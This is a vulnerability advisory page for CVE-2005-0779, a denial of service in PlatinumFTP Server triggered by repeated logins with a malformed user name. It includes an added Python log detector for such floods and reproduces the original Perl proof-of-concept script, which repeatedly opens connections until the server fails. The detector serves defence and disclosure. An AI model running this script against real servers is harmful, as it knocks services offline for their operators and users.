Platinum FTP Server Denial-of-Service Vulnerability

Vulnerability ID: 1108500    Vulnerability type: Other
Published: 2005-03-05    Updated: 2007-01-04
CVE ID: CVE-2005-0779    CNNVD-ID: CNNVD-200505-405
Platform: Windows    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/25218
https://www.securityfocus.com/bid/12790
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-405
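|Vulnerability details
PlatinumFTPServer is a powerful FTP server for the Windows platform. PlatinumFTPServer contains a denial-of-service vulnerability. If a remote user opens 50 or more connections that authenticate with a malformed user name, a denial of service may result.
|Exploit (EXP)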
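For defenders, the condition described above (50 or more connections from one client authenticating with a malformed user name) can be flagged from FTP server logs. The following is an added example, not part of the original advisory or of PlatinumFTP. The log format, the 60-second window and the definition of "malformed" (a user name with no letter or digit, which covers the lone backslash sent by the published PoC) are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 50                  # connection count named in the advisory
WINDOW = timedelta(seconds=60)  # assumption: the page gives no time window

def is_malformed(username):
    # Assumption: "malformed" means no letter or digit at all, which covers
    # the lone backslash the published PoC sends as its user name.
    return not any(ch.isalnum() for ch in username)

def parse_line(line):
    # Constructed log format: "<ISO timestamp> <client IP> USER <name>"
    parts = line.rstrip("\n").split(" ", 3)
    if len(parts) < 3 or parts[2] != "USER":
        return None
    name = parts[3] if len(parts) == 4 else ""
    return datetime.fromisoformat(parts[0]), parts[1], name

def find_floods(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {client_ip: time at which the threshold was first reached}."""
    recent = defaultdict(deque)   # client IP -> timestamps inside the window
    alerts = {}
    for line in lines:
        event = parse_line(line)
        if event is None or not is_malformed(event[2]):
            continue
        ts, ip, _ = event
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:      # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts

def sample_log():
    # Constructed sample: 60 rapid attempts with user name "\" from one host,
    # plus five ordinary logins from another host.
    base = datetime(2005, 3, 12, 10, 0, 0)
    lines = [f"{(base + timedelta(milliseconds=200 * i)).isoformat()} 203.0.113.7 USER \\"
             for i in range(60)]
    lines += [f"{(base + timedelta(seconds=i)).isoformat()} 198.51.100.4 USER alice"
              for i in range(5)]
    return sorted(lines)

if __name__ == "__main__":
    for ip, when in find_floods(sample_log()).items():
        print(f"{when.isoformat()} {ip}: >= {THRESHOLD} malformed USER attempts")
```

A per-client connection limit on the FTP service or at the firewall addresses the same condition at the network level.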
source: http://www.securityfocus.com/bid/12790/info

PlatinumFTPServer is prone to a denial-of-service vulnerability. This issue is reported to occur when a remote user makes 50 or more connections that attempt to authenticate with a malformed user name. 

#!/usr/bin/perl
# plftpdos1.pl - Remote DoS against PlatinumFTP 10.1.18 using \
# 
# If you don't get the server down try to change/play a little bit with
# the Timeout

# 2005/05/03
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il


use strict;
use Net::FTP;

my $host;
my $username = '\\';

if ($#ARGV < 0) { &syntax(); }
$host = $ARGV[0];

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21) or die "can you see a ftp server? i can't.\n";

print "denial of service in progress\n";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!\n";

sub syntax {
    print "\nUsage: pftpdos1.pl IP\n";
    exit (1);
    }
|Affected products
PlatinumFTP PlatinumFTPserver 1.0.18
|References

Source: XF
Name: platinumftp-username-dos(19674)
Link: http://xforce.iss.net/xforce/xfdb/19674
Source: BID
Name: 12790
Link: http://www.securityfocus.com/bid/12790
Source: BUGTRAQ
Name: 20050312PlatinumFTP1.0.18remoteDoS
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111066232415249&w=2
Source: BUGTRAQ
Name: 20070101Re:PlatinumFTP1.0.18remoteDoS
Link: http://www.securityfocus.com/archive/1/archive/1/455609/100/0/threaded